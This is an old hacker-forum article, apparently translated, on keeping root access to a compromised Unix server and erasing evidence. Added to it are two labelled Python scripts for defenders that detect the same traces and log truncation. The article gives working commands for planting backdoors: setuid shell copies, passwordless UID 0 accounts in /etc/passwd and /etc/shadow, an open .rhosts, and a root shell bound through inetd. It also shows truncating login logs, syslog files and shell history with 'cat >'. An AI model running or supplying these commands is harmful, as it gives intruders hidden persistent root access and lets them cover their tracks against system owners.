Research on system backdoor techniques and log erasure

Source: Internet
Author: User
Tags: chmod, syslog, system log
Getting hold of a server is not easy, and once you are discovered, it is gone! What a pity!
In fact, there are many kinds of backdoor methods:

1. setuid
#cp /bin/sh /tmp/.sh
#chmod u+s /tmp/.sh
This adds the setuid bit to a copy of the shell. Very simple, but also easy to find.

2. echo "Hack::0:0::/:/bin/csh" >> /etc/passwd
That is, add an account with UID 0 (root) and no password to the system.
But the administrator will be able to find it very soon!
3. echo "+ +" >> /.rhosts
If this system has ports 512 and 513 open, hehe, then
with this entry in the .rhosts file you can rlogin without a password!

4. Modify the sendmail.cf file to add a "wiz" command;
then telnet to www.xxx.com on port 25, send WIZ .... OK
 
5. Change an existing user's password
If there are many users on the host, and you see a user who has not logged in for a long time, you can change his password.
The passwd command does this: #passwd
6. rootkit backdoor packages
There are many places on the Internet to download them; go look. I tried; I am still testing too! NO!!!!
- BSD backdoor:
echo "love::92:206::0:0::/:/bin/sh" >> /etc/master.passwd
/usr/sbin/pwd_mkdb /etc/master.passwd

Here I added a user named love whose user ID is 92; root's is 0!
OK, the user has been added! But what about the missing privileges?
cp /bin/sh /tmp/.x (the x is an arbitrary choice, such as .sh, .a, .b, etc.)
chmod 777 /tmp/.x
chmod +s /tmp/.x
Just use this to give him a little back door.
After we log into this compromised host we can use /tmp/.x to elevate privileges.

- AIX backdoor (Kelvinzhou taught me this, thank you)
echo "ingreslock stream tcp nowait root /bin/sh" >> /tmp/.x
/usr/sbin/inetd -s /tmp/.x
rm /tmp/.x
Then you can telnet to the IP on port 1524 and get a root shell directly.
- SunOS backdoor
echo "Love::0:0::/:/bin/bash" >> /etc/passwd
echo "Love:::::::" >> /etc/shadow
When you telnet in, you are root! But it is not reliable!
- Linux backdoor
echo "Love::0:0::/:/bin/bash" >> /etc/passwd
echo "Love:::::::" >> /etc/shadow
If you have time, leave a few more back doors!
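Every entry above leaves a fixed, checkable trace on disk: a setuid copy of the shell under /tmp, a second UID 0 line in /etc/passwd, an empty password field in /etc/passwd or /etc/shadow, a "+ +" line in .rhosts, and an inetd entry whose server program is /bin/sh. The audit script below is an added example written for this page; it is not part of the original article. The sample file contents (PASSWD_TEXT and the others) are constructed to reproduce the article's entries, and the function names are my own; each function takes file contents as a string or a directory path, so the same checks can be pointed at the live /etc/passwd, /etc/shadow, /etc/inetd.conf and ~/.rhosts of any Unix host.

```python
import os
import stat

# Added defensive audit (not from the article). The functions take file
# contents or directory paths; the *_TEXT samples at the bottom are
# constructed to reproduce the entries shown above.

SHELLS = ("/bin/sh", "/bin/csh", "/bin/bash", "/bin/ksh")

def extra_uid0_accounts(passwd_text):
    """Login names with UID 0 other than root (the 'Hack' / 'Love' lines)."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if line.startswith("#") or len(fields) < 7:
            continue  # comment or malformed; a passwd entry has 7 fields
        name, uid = fields[0], fields[2]
        if uid == "0" and name != "root":
            hits.append(name)
    return hits

def empty_password_accounts(passwd_text, shadow_text=""):
    """Accounts whose password field (field 2) is empty in passwd or shadow,
    i.e. login with no password at all ('Love:::::::')."""
    hits = set()
    for text in (passwd_text, shadow_text):
        for line in text.splitlines():
            fields = line.split(":")
            if line.startswith("#") or len(fields) < 2 or not fields[0]:
                continue
            if fields[1] == "":
                hits.add(fields[0])
    return sorted(hits)

def rhosts_trusts_everyone(rhosts_text):
    """True if a '+' or '+ +' line lets any host / any user rlogin in."""
    for line in rhosts_text.splitlines():
        tokens = line.split()
        if tokens and tokens[0] == "+" and (len(tokens) == 1 or tokens[1] == "+"):
            return True
    return False

def inetd_shell_services(inetd_text):
    """(service, user, program) for inetd.conf lines whose server program is
    a shell. Field order: service type proto wait/nowait user program args."""
    hits = []
    for line in inetd_text.splitlines():
        tokens = line.split()
        if not tokens or tokens[0].startswith("#") or len(tokens) < 6:
            continue
        if tokens[5] in SHELLS:
            hits.append((tokens[0], tokens[4], tokens[5]))
    return hits

def is_setuid_mode(mode):
    """True for a regular file carrying the setuid or setgid bit."""
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))

def setuid_files_in(directory):
    """Regular files below directory (e.g. /tmp) with setuid/setgid set."""
    hits = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            try:
                st = os.lstat(path)  # lstat so a symlink cannot redirect the check
            except OSError:
                continue
            if is_setuid_mode(st.st_mode):
                hits.append(path)
    return sorted(hits)

def audit(passwd_text, shadow_text, rhosts_text, inetd_text, tmp_dir="/tmp"):
    """Run every check and return the findings keyed by check name."""
    return {
        "extra_uid0": extra_uid0_accounts(passwd_text),
        "no_password": empty_password_accounts(passwd_text, shadow_text),
        "rhosts_open": rhosts_trusts_everyone(rhosts_text),
        "inetd_shells": inetd_shell_services(inetd_text),
        "setuid_in_tmp": setuid_files_in(tmp_dir),
    }

# Constructed samples reproducing the article's entries (not real hosts).
PASSWD_TEXT = (
    "root:x:0:0:root:/root:/bin/sh\n"
    "Hack::0:0::/:/bin/csh\n"
    "Love::0:0::/:/bin/bash\n"
    "alice:x:1000:1000::/home/alice:/bin/bash\n"
)
SHADOW_TEXT = "root:$6$placeholder:19000:0:99999:7:::\nLove:::::::\n"
RHOSTS_TEXT = "+ +\n"
INETD_TEXT = (
    "#service type proto wait user program\n"
    "ftp stream tcp nowait root /usr/sbin/ftpd ftpd\n"
    "ingreslock stream tcp nowait root /bin/sh\n"
)

if __name__ == "__main__":
    for check, result in audit(PASSWD_TEXT, SHADOW_TEXT, RHOSTS_TEXT, INETD_TEXT).items():
        print(check, result)
```

Run it as root so /etc/shadow is readable. Any non-empty finding deserves a look; on a host where the r-services and inetd are disabled the rhosts and inetd checks should be empty simply because those files are absent.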
After leaving the back door you have to wipe your traces; don't forget this either!
Unix system log files are usually stored in the /var/log and /var/adm directories. Usually we can look at syslog.conf to see the log configuration, for example: cat /etc/syslog.conf
Generally the logs we want to clear are:
lastlog
utmp
wtmp
messages
syslog
sulog
In addition, the various shells also record the command history of the user. This history is kept in a file in the user's home directory, usually named .sh_history (ksh), .history (csh) or .bash_history (bash).
If you have a log-wiping program like wipe.c, you can let it do the job; otherwise it has to be done by hand! It is recommended not to rm the logs; it is better to edit the log,
like this:
#cat > /usr/log/lastlog
-> Type here whatever you want written, or type nothing at all!
^D -> Here ^D is the key Ctrl+D! Done!
#
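On the defender's side, the files listed above are exactly where the footprint of log erasure shows up. lastlog, utmp and wtmp are binary record files, so overwriting them from the keyboard with cat > leaves a zero-byte or text-filled file; messages, syslog and sulog only grow between log rotations, so a size that drops without a rotation is suspicious; and a copy of the logs forwarded to another host (the @host action in syslog.conf) cannot be erased from the compromised machine at all. The script below is an added example for this page, not code from the article: it parses a syslog.conf to report whether any rule forwards remotely, and compares log-file sizes against a saved baseline. SYSLOG_CONF is a constructed sample, the log directory paths are placeholders, and the function names are my own.

```python
import os

# Added example (not from the article). The file paths used here are
# placeholders and SYSLOG_CONF is a constructed sample.

LOG_FILES = ("lastlog", "utmp", "wtmp", "messages", "syslog", "sulog")

def parse_syslog_conf(text):
    """(selector, action) pairs from a classic syslog.conf; the selector is
    'facility.priority[;...]' and the action is a file, '*' or '@host'."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) == 2:
            rules.append((parts[0], parts[1].strip()))
    return rules

def remote_log_targets(rules):
    """Actions beginning with '@' forward a copy to another host, out of
    reach of 'cat > file'; an empty list means every log is local only."""
    return [action for _sel, action in rules if action.startswith("@")]

def log_paths(log_dir):
    """Full paths of the usual log files under log_dir (/var/log or /var/adm)."""
    return [os.path.join(log_dir, name) for name in LOG_FILES]

def snapshot_sizes(paths):
    """Current size of each path; a file that does not exist is recorded as None."""
    sizes = {}
    for path in paths:
        try:
            sizes[path] = os.path.getsize(path)
        except OSError:
            sizes[path] = None
    return sizes

def shrunk_logs(baseline, current):
    """Paths whose size dropped, or that vanished, since the baseline: the
    footprint of truncating or deleting a log. Log rotation also shrinks
    files, so check findings against the rotation schedule."""
    suspicious = []
    for path, old_size in baseline.items():
        if old_size is None:
            continue  # did not exist at baseline time; nothing to compare
        new_size = current.get(path)
        if new_size is None or new_size < old_size:
            suspicious.append(path)
    return sorted(suspicious)

SYSLOG_CONF = """# constructed sample, not a real host's configuration
*.info;mail.none;authpriv.none\t/var/log/messages
authpriv.*\t/var/log/secure
*.emerg\t*
auth.*\t@loghost.example.internal
"""

if __name__ == "__main__":
    rules = parse_syslog_conf(SYSLOG_CONF)
    print("remote targets:", remote_log_targets(rules) or "none (local logs only)")
    paths = log_paths("/var/log")
    baseline = snapshot_sizes(paths)  # keep this copy where the host cannot reach it
    print("shrunk since baseline:", shrunk_logs(baseline, snapshot_sizes(paths)))
```

Keep the baseline off the host (or at least where the account an intruder holds cannot write), since a baseline stored next to the logs can be adjusted along with them.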
Well, that's enough; there is a lot to learn and I am still a newbie myself! See you!
